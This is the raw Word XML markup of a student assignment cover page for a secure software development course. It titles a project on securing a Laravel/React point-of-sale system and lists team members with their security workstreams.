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png" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image12.png" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image13.png" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image14.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FA07" w14:textId="40450EA8" w:rsidR="00345BB3" w:rsidRPr="00FC61B3" w:rsidRDefault="008125F0" w:rsidP="00FC61B3">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC61B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Securing a Multi-Branch Point-of-Sale System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14529E9C" w14:textId="00470986" w:rsidR="00345BB3" w:rsidRPr="00FC61B3" w:rsidRDefault="008125F0" w:rsidP="00591D0B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC61B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SE4030 </w:t>
      </w:r>
      <w:r w:rsidR="00591D0B" w:rsidRPr="00FC61B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC61B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Secure Software Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A71AF7" w14:textId="73AC25F7" w:rsidR="00591D0B" w:rsidRPr="005C54CB" w:rsidRDefault="00591D0B" w:rsidP="00591D0B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC61B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B85C3" w14:textId="3450069E" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00345BB3">
      <w:pPr>
        <w:spacing w:after="224" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="29" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2967616F" w14:textId="51FF5E90" w:rsidR="00345BB3" w:rsidRPr="00031B5E" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00031B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Application:</w:t>
      </w:r>
      <w:r w:rsidRPr="00031B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pubudu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00031B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tyres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00031B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> POS / mini-ERP </w:t>
      </w:r>
      <w:r w:rsidR="00591D0B" w:rsidRPr="00031B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00031B5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Laravel 10 REST API + React 19 SPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3E89C" w14:textId="77777777" w:rsidR="00591D0B" w:rsidRPr="005C54CB" w:rsidRDefault="00591D0B">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10194" w:type="dxa"/>
        <w:tblInd w:w="38" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:tblCellMar>
          <w:left w:w="112" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2998"/>
        <w:gridCol w:w="1335"/>
        <w:gridCol w:w="5861"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="5CC1548D" w14:textId="77777777" w:rsidTr="00591D0B">
        <w:trPr>
          <w:trHeight w:val="435"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="299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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E119FC2" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="1" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="052ADDC6" w14:textId="3483D493" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="6" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00591D0B" w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T </w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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Mar>
              <w:top w:w="90" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="588AB7FD" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Workstream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="5B2C99D3" w14:textId="77777777" w:rsidTr="00591D0B">
        <w:trPr>
          <w:trHeight w:val="446"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="299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pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>P.A.R.B. Subasingha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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402CEFCF" w14:textId="2ECF48CA" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D14F02F" wp14:editId="774F02B4">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>71437</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="638175" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29131" name="Group 29131"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="638175" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="638175" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="114" name="Shape 114"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="638175" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="638175" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="628650" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="631280" y="0"/>
                                        <a:pt x="633525" y="930"/>
                                        <a:pt x="635385" y="2790"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="637245" y="4650"/>
                                        <a:pt x="638175" y="6895"/>
                                        <a:pt x="638175" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="638175" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="638175" y="126455"/>
                                        <a:pt x="637245" y="128700"/>
                                        <a:pt x="635385" y="130560"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="633525" y="132420"/>
                                        <a:pt x="631280" y="133350"/>
                                        <a:pt x="628650" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133350"/>
                                        <a:pt x="4650" y="132420"/>
                                        <a:pt x="2790" y="130560"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128700"/>
                                        <a:pt x="0" y="126455"/>
                                        <a:pt x="0" y="123825"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:ln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131" style="width:50.25pt;height:10.5pt;position:absolute;z-index:-2147483540;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.62498pt;mso-position-vertical-relative:text;margin-top:-1.86307pt;" coordsize="6381,1333">
                      <v:shape id="Shape 114" style="position:absolute;width:6381;height:1333;left:0;top:0;" coordsize="638175,133350" path="m9525,0l628650,0c631280,0,633525,930,635385,2790c637245,4650,638175,6895,638175,9525l638175,123825c638175,126455,637245,128700,635385,130560c633525,132420,631280,133350,628650,133350l9525,133350c6895,133350,4650,132420,2790,130560c930,128700,0,126455,0,123825l0,9525c0,6895,930,4650,2790,2790c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00591D0B" w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IT22098450</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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16F8A05C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="10" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Access control, session management, OAuth/OIDC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="12DE7258" w14:textId="77777777" w:rsidTr="00591D0B">
        <w:trPr>
          <w:trHeight w:val="624"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="299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pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>R.M.K.N. Gunasena</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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400495F1" w14:textId="7163C4B2" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="068032C6" wp14:editId="7F2882F5">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>71437</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="638175" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29351" name="Group 29351"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="638175" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="638175" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="120" name="Shape 120"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="638175" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="638175" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="628650" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="631280" y="0"/>
                                        <a:pt x="633525" y="930"/>
                                        <a:pt x="635385" y="2790"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="637245" y="4650"/>
                                        <a:pt x="638175" y="6895"/>
                                        <a:pt x="638175" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="638175" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="638175" y="126455"/>
                                        <a:pt x="637245" y="128700"/>
                                        <a:pt x="635385" y="130560"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="633525" y="132420"/>
                                        <a:pt x="631280" y="133350"/>
                                        <a:pt x="628650" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133350"/>
                                        <a:pt x="4650" y="132420"/>
                                        <a:pt x="2790" y="130560"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="128700"/>
                                        <a:pt x="0" y="126455"/>
                                        <a:pt x="0" y="123825"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:ln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351" style="width:50.25pt;height:10.5pt;position:absolute;z-index:-2147483534;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.62498pt;mso-position-vertical-relative:text;margin-top:-1.86307pt;" coordsize="6381,1333">
                      <v:shape id="Shape 120" style="position:absolute;width:6381;height:1333;left:0;top:0;" coordsize="638175,133350" path="m9525,0l628650,0c631280,0,633525,930,635385,2790c637245,4650,638175,6895,638175,9525l638175,123825c638175,126455,637245,128700,635385,130560c633525,132420,631280,133350,628650,133350l9525,133350c6895,133350,4650,132420,2790,130560c930,128700,0,126455,0,123825l0,9525c0,6895,930,4650,2790,2790c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00591D0B" w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IT22078582</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="58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0AF923C8" w14:textId="3F3F0D1C" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00591D0B" w:rsidP="00591D0B">
            <w:pPr>
              <w:spacing w:after="4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18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Frontend attack surface and API response confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="6890B35C" w14:textId="77777777" w:rsidTr="00591D0B">
        <w:trPr>
          <w:trHeight w:val="439"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="299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pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>R.H.F. Hamna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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67D4745F" w14:textId="1DF1DE3E" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02663933" wp14:editId="26ACFADF">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>71437</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23660</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="638175" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29531" name="Group 29531"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="638175" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="638175" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="126" name="Shape 126"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="638175" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="638175" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="628650" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="631280" y="0"/>
                                        <a:pt x="633525" y="930"/>
                                        <a:pt x="635385" y="2790"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="637245" y="4650"/>
                                        <a:pt x="638175" y="6895"/>
                                        <a:pt x="638175" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="638175" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="638175" y="135980"/>
                                        <a:pt x="637245" y="138225"/>
                                        <a:pt x="635385" y="140085"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="633525" y="141945"/>
                                        <a:pt x="631280" y="142875"/>
                                        <a:pt x="628650" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142875"/>
                                        <a:pt x="4650" y="141945"/>
                                        <a:pt x="2790" y="140085"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138225"/>
                                        <a:pt x="0" y="135980"/>
                                        <a:pt x="0" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:ln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531" style="width:50.25pt;height:11.25pt;position:absolute;z-index:-2147483528;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.62498pt;mso-position-vertical-relative:text;margin-top:-1.86304pt;" coordsize="6381,1428">
                      <v:shape id="Shape 126" style="position:absolute;width:6381;height:1428;left:0;top:0;" coordsize="638175,142875" path="m9525,0l628650,0c631280,0,633525,930,635385,2790c637245,4650,638175,6895,638175,9525l638175,133350c638175,135980,637245,138225,635385,140085c633525,141945,631280,142875,628650,142875l9525,142875c6895,142875,4650,141945,2790,140085c930,138225,0,135980,0,133350l0,9525c0,6895,930,4650,2790,2790c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
